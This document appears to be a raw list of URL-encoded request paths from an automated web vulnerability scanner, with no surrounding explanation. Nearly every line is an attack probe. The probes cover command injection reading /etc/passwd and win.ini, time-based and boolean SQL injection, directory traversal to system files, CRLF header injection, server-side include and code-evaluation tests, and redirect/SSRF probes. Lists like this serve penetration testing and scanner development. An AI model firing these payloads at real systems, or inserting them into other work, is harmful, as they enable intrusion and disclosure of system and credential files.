/
/%0d%0aNeww%3a%20Headerr
/%0d%0aNeww%3a%20Headerr%0d%0a
/%20%252fbin%252fcat%20%252fetc%252fpasswd
/%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/%20%60ping%20-c%206%20localhost%60
/%20%60ping%20-c%206%20localhost%60/
/%20ping%20-c%206%20localhost
/%20ping%20-c%206%20localhost/
/%20ping%20-n%206%20localhost
/%20ping%20-n%206%20localhost/
/%20run%20ping%20-n%206%20localhost
/%20run%20ping%20-n%206%20localhost/
/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini
/%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%20type%20%25SYSTEMROOT%25%5cwin.ini
/%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%22
/%22%20and%20pg_sleep(5)--
/%22%20and%20sleep(5)%23
/%22%20and%20sleep(5)%3d%22
/%22%20or%20pg_sleep(5)--
/%22%20or%20sleep(5)%23
/%22%20or%20sleep(5)%3d%22
/%22%3becho%201889409%2b1889409%3b
/%22%3becho%201889409%2b1889409%3b%23
/%22%3bimport%20time%3btime.sleep(5)%3b
/%22%3bimport%20time%3btime.sleep(5)%3b%23
/%22%3bprint%201889409%2b1889409
/%22%3bprint%201889409%2b1889409%23
/%22%3bprint%201889409%2b1889409%3b
/%22%3bprint%201889409%2b1889409%3b%23
/%22%3bputs%201889409%2b1889409
/%22%3bputs%201889409%2b1889409%23
/%22%3bResponse.Write(1889409%2b1889409)
/%22%3bResponse.Write(1889409%2b1889409)'
/%22%3bsleep(5)%3b
/%22%3bsleep(5)%3b%23
/%22%3bwaitfor%20delay%20'0%3a0%3a5'--
/%22'%3e%3c!--%23printenv%20--%3e
/%22'%3e%3c!--%23printenv%20--%3e/
/%22)%20and%20pg_sleep(5)--
/%22)%20and%20sleep(5)%3d%22
/%22)%20or%20pg_sleep(5)--
/%22)%20or%20sleep(5)%3d%22
/%22)%3bwaitfor%20delay%20'0%3a0%3a5'--
/%22))%20and%20pg_sleep(5)--
/%22))%20and%20sleep(5)%3d%22
/%22))%20or%20pg_sleep(5)--
/%22))%20or%20sleep(5)%3d%22
/%22))%3bwaitfor%20delay%20'0%3a0%3a5'--
/%23%5e(%24!%40%24)(()))******
/%23%5e(%24!%40%24)(()))******/
/%24%7b4674984%2b4674984%7d/
/%24%7b8590556%2b8590556%7d
/%252f
/%252f%252f192.168.1.106.example.org
/%252f%252f192.168.1.106.example.org/
/%252f%252f192.168.1.106.fpwzyqmc
/%252f%252f192.168.1.106.fpwzyqmc/
/%252f%252fexample.org
/%252f%252fexample.org/
/%252f/
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%26%26%20ping%20-c%206%20localhost
/%26%26%20ping%20-c%206%20localhost/
/%26%26%20ping%20-n%206%20localhost
/%26%26%20ping%20-n%206%20localhost/
/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini
/%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%3b%20ping%20-c%206%20localhost
/%3b%20ping%20-c%206%20localhost/
/%3b%20ping%20-n%206%20localhost
/%3b%20ping%20-n%206%20localhost/
/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini
/%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%3becho%201889409%2b1889409%3b
/%3becho%201889409%2b1889409%3b%23
/%3bprint%201889409%2b1889409
/%3bprint%201889409%2b1889409%23
/%3bprint%201889409%2b1889409%3b
/%3bprint%201889409%2b1889409%3b%23
/%3bputs%201889409%2b1889409
/%3bputs%201889409%2b1889409%23
/%3bResponse.Write(1889409%2b1889409)
/%3bResponse.Write(1889409%2b1889409)'
/%3bwaitfor%20delay%20'0%3a0%3a5'--
/%3c!--%23printenv%20--%3e
/%3c!--%23printenv%20--%3e/
/%3c!--'%22a
/%3c!--'%22a/
/%3ch%20xhx%3dyhy%3e
/%3ch%20xhx%3dyhy%3e/
/%5c
/%5c/
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/%7c%20ping%20-c%206%20localhost
/%7c%20ping%20-c%206%20localhost/
/%7c%20ping%20-n%206%20localhost
/%7c%20ping%20-n%206%20localhost/
/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini
/%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/%c2%bf'"(
/'
/'%20and%20pg_sleep(5)--
/'%20and%20sleep(5)%23
/'%20and%20sleep(5)%3d'
/'%20or%20pg_sleep(5)--
/'%20or%20sleep(5)%23
/'%20or%20sleep(5)%3d'
/'%3becho%201889409%2b1889409%3b
/'%3becho%201889409%2b1889409%3b%23
/'%3bimport%20time%3btime.sleep(5)%3b
/'%3bimport%20time%3btime.sleep(5)%3b%23
/'%3bprint%201889409%2b1889409
/'%3bprint%201889409%2b1889409%23
/'%3bprint%201889409%2b1889409%3b
/'%3bprint%201889409%2b1889409%3b%23
/'%3bputs%201889409%2b1889409
/'%3bputs%201889409%2b1889409%23
/'%3bResponse.Write(1889409%2b1889409)
/'%3bResponse.Write(1889409%2b1889409)'
/'%3bsleep(5)%3b
/'%3bsleep(5)%3b%23
/'%3bwaitfor%20delay%20'0%3a0%3a5'--
/')%20and%20pg_sleep(5)--
/')%20and%20sleep(5)%3d'
/')%20or%20pg_sleep(5)--
/')%20or%20sleep(5)%3d'
/')%3bwaitfor%20delay%20'0%3a0%3a5'--
/'))%20and%20pg_sleep(5)--
/'))%20and%20sleep(5)%3d'
/'))%20or%20pg_sleep(5)--
/'))%20or%20sleep(5)%3d'
/'))%3bwaitfor%20delay%20'0%3a0%3a5'--
/(
/)
/)%3bwaitfor%20delay%20'0%3a0%3a5'--
/))%3bwaitfor%20delay%20'0%3a0%3a5'--
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.html
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.html/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.jpg
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.jpg/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.txt
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00.txt/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.html
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.html/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.jpg
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.jpg/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.txt
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.txt/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.html
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.html/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.jpg
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.jpg/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.txt
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00.txt/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini%00/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWindows%5cWin.ini/
/0-a
/0-b
/1%20and%20pg_sleep(5)--
/1%20and%20sleep(5)%23
/1%20or%20pg_sleep(5)--
/1%20or%20sleep(5)%23
/1%2b2
/1)%20and%20pg_sleep(5)--
/1)%20and%20sleep(5)%23
/1)%20or%20pg_sleep(5)--
/1)%20or%20sleep(5)%23
/1))%20and%20pg_sleep(5)--
/1))%20and%20sleep(5)%23
/1))%20or%20pg_sleep(5)--
/1))%20or%20sleep(5)%23
/1-1
/11-5
/12-6
/123
/192.168.1.106.example.org
/192.168.1.106.example.org/
/2%2b1
/2%2b6
/2-2
/21%20or%205%3d8--
/21%20or%207%3d5--
/21%20or%207%3d7--
/21%20or%208%3d8--
/3%2b5
/3%2ba
/3%2bb
/5%3bURL%3d'http%3a%252f%252f192.168.1.106.example.org'
/5%3bURL%3d'http%3a%252f%252f192.168.1.106.example.org'/
/5%3bURL%3d'http%3a%252f%252fexample.org'
/5%3bURL%3d'http%3a%252f%252fexample.org'/
/aa%0d%0aNeww%3a%20Headerr
/aa%0d%0aNeww%3a%20Headerr%0d%0a
/aaa
/aaa/
/admin%0auploads%0a/
/admin%0auploads%0a/should_not_xist_fffffffffff
/admin%0auploads%0a/should_not_xist_ggggggggggg
/admin%0auploads%0a/should_not_xist_hhhhhhhhhhh
/admin%0auploads%0a/should_not_xist_jjjjjjjjjjjj
/admin%0auploads%0a/should_not_xist_llllllllllll
/admin%0auploads%0a/should_not_xist_tttttttttttttt
/admin%0auploads%0a/should_not_xist_wwwwwwwwwwwwwww
/admin%0auploads%0a/should_not_xist_yyyyyyyyyyyyyyy
/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a
/echo%201889409%2b1889409%3b
/echo%201889409%2b1889409%3b%23
/example.org
/example.org/
/eziepwlivt
/eziepwlivt/
/file%3a%252faaa
/file%3a%252faaa/
/fpwzyqmc
/fpwzyqmc/
/http%3a%252f%252f192.168.1.106.example.org
/http%3a%252f%252f192.168.1.106.example.org/
/http%3a%252f%252f192.168.1.106.fpwzyqmc
/http%3a%252f%252f192.168.1.106.fpwzyqmc/
/http%3a%252f%252fexample.org
/http%3a%252f%252fexample.org/
/http%3a%252f%252fr39637803577395483937.example.org
/http%3a%252f%252fr39637803577397158689.example.org%252f
/http%3a%252f%252fr39637803577399536586.example.org%252fa
/http%3a%252f%252fwww.iana.org
/http%3a%252f%252fwww.iana.org%252f
/http%3a%252f%252fwww.iana.org%252fa
/https%3a%252f%252f192.168.1.106.example.org
/https%3a%252f%252f192.168.1.106.example.org/
/https%3a%252f%252f192.168.1.106.fpwzyqmc
/https%3a%252f%252f192.168.1.106.fpwzyqmc/
/https%3a%252f%252fexample.org
/https%3a%252f%252fexample.org/
/https%3a%252f%252fr39637803577401584610.example.org
/https%3a%252f%252fr39637803577403210035.example.org%252f
/https%3a%252f%252fr39637803577404731872.example.org%252fa
/https%3a%252f%252fwww.iana.org
/https%3a%252f%252fwww.iana.org%252f
/https%3a%252f%252fwww.iana.org%252fa
/import%20time%3btime.sleep(5)%3b
/import%20time%3btime.sleep(5)%3b%23
/localhost%3a65533
/localhost%3a65533/
/localhost%3a65534
/localhost%3a65534/
/localhost%3a65555
/localhost%3a65555/
/localhost%3a66666
/localhost%3a66666/
/mmmm4mmmmmmm/
/pg_sleep(5)--
/print%201889409%2b1889409
/print%201889409%2b1889409%23
/print%201889409%2b1889409%3b
/print%201889409%2b1889409%3b%23
/puts%201889409%2b1889409
/puts%201889409%2b1889409%23
/r39637803577390284079.example.org
/r39637803577391965119.example.org%252f
/r39637803577393736310.example.org%252fa
/Response.Write(1889409%2b1889409)
/Response.Write(1889409%2b1889409)'
/should_not_xist_bbbbbbbbbb
/should_not_xist_cccccccccc
/should_not_xist_dddddddddd
/should_not_xist_eeeeeeeeee
/should_not_xist_ggggggggggg
/should_not_xist_hhhhhhhhhhh
/should_not_xist_jjjjjjjjjjjj
/should_not_xist_ooooooooooooo
/should_not_xist_ppppppppppppp
/should_not_xist_qqqqqqqqqqqqq
/should_not_xist_yyyyyyyyyyyyyyy
/sleep(5)%23
/sleep(5)%3b
/sleep(5)%3b%23
/URL%3d'http%3a%252f%252f192.168.1.106.example.org'
/URL%3d'http%3a%252f%252f192.168.1.106.example.org'/
/URL%3d'http%3a%252f%252fexample.org'
/URL%3d'http%3a%252f%252fexample.org'/
/UTF-7
/UTF-7/
/UTF-8
/UTF-8/
/uuuu3uuuuuu
/w%20'eb
/w%2b'eb
/w%7c%7c'eb
/w'%20'eb
/w'%2b'eb
/w'%7c%7c'eb
/web
/web%0d%0aNeww%3a%20Headerr
/web%0d%0aNeww%3a%20Headerr%0d%0a
/web%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60
/web%20%60%252fbin%252fcat%20%252fetc%252fpasswd%60/
/web%20%60ping%20-c%206%20localhost%60
/web%20%60ping%20-c%206%20localhost%60/
/web%20ping%20-c%206%20localhost
/web%20ping%20-c%206%20localhost/
/web%20ping%20-n%206%20localhost
/web%20ping%20-n%206%20localhost/
/web%20run%20ping%20-n%206%20localhost
/web%20run%20ping%20-n%206%20localhost/
/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%20run%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%22%20and%20%22s%22%3d%22r
/web%22%20and%20%22s%22%3d%22s
/web%22%20and%20%22t%22%3d%22r
/web%22%20and%20%22t%22%3d%22t
/web%22%20and%205%3d8--
/web%22%20and%207%3d5--
/web%22%20and%207%3d7--
/web%22%20and%208%3d8--
/web%22'%3e%3c!--%23printenv%20--%3e
/web%22'%3e%3c!--%23printenv%20--%3e/
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%26%26%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%26%26%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%26%26%20ping%20-c%206%20localhost
/web%26%26%20ping%20-c%206%20localhost/
/web%26%26%20ping%20-n%206%20localhost
/web%26%26%20ping%20-n%206%20localhost/
/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%26%26%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%3b%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%3b%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%3b%20ping%20-c%206%20localhost
/web%3b%20ping%20-c%206%20localhost/
/web%3b%20ping%20-n%206%20localhost
/web%3b%20ping%20-n%206%20localhost/
/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%3b%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd
/web%7c%20%252fbin%252fcat%20%252fetc%252fpasswd/
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20
/web%7c%20%252fusr%252fsbin%252fping%20-s%20localhost%201000%206%20/
/web%7c%20ping%20-c%206%20localhost
/web%7c%20ping%20-c%206%20localhost/
/web%7c%20ping%20-n%206%20localhost
/web%7c%20ping%20-n%206%20localhost/
/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini
/web%7c%20type%20%25SYSTEMROOT%25%5cwin.ini/
/web'%20and%20's'%3d'r
/web'%20and%20's'%3d's
/web'%20and%20't'%3d'r
/web'%20and%20't'%3d't
/web'%20and%205%3d8--
/web'%20and%207%3d5--
/web'%20and%207%3d7--
/web'%20and%208%3d8--
/web/
/web/admin%0auploads%0a/
/web/admin%0auploads%0a/should_not_xist_dddddddddd
/web/admin%0auploads%0a/should_not_xist_eeeeeeeeeee
/web/admin%0auploads%0a/should_not_xist_fffffffffff
/web/admin%0auploads%0a/should_not_xist_iiiiiiiiiii
/web/admin%0auploads%0a/should_not_xist_kkkkkkkkkkkk
/web/admin%0auploads%0a/should_not_xist_qqqqqqqqqqqqq
/web/admin%0auploads%0a/should_not_xist_rrrrrrrrrrrrrr
/web/admin%0auploads%0a/should_not_xist_vvvvvvvvvvvvvv
/web/admin%0auploads%0a/should_not_xist_yyyyyyyyyyyyyyy
/web/crossdomain.xml%0aadmin.php%0aadmin.aspx%0a
/web/should_not_xist_bbbbbbbbbb
/web/should_not_xist_hhhhhhhhhhh
/web/should_not_xist_jjjjjjjjjjjj
/web/should_not_xist_mmmmmmmmmmmm
/web/should_not_xist_tttttttttttttt
/web/should_not_xist_vvvvvvvvvvvvvvv
/web/should_not_xist_wwwwwwwwwwwwwww
/web/should_not_xist_yyyyyyyyyyyyyyy
/webaa%0d%0aNeww%3a%20Headerr
/webaa%0d%0aNeww%3a%20Headerr%0d%0a
/webxxx%22%20or%20%22s%22%3d%22r
/webxxx%22%20or%20%22s%22%3d%22s
/webxxx%22%20or%20%22t%22%3d%22r
/webxxx%22%20or%20%22t%22%3d%22t
/webxxx%22%20or%205%3d8--
/webxxx%22%20or%207%3d5--
/webxxx%22%20or%207%3d7--
/webxxx%22%20or%208%3d8--
/webxxx'%20or%20's'%3d'r
/webxxx'%20or%20's'%3d's
/webxxx'%20or%20't'%3d'r
/webxxx'%20or%20't'%3d't
/webxxx'%20or%205%3d8--
/webxxx'%20or%207%3d5--
/webxxx'%20or%207%3d7--
/webxxx'%20or%208%3d8--
/www.iana.org
/www.iana.org%252f
/www.iana.org%252fa
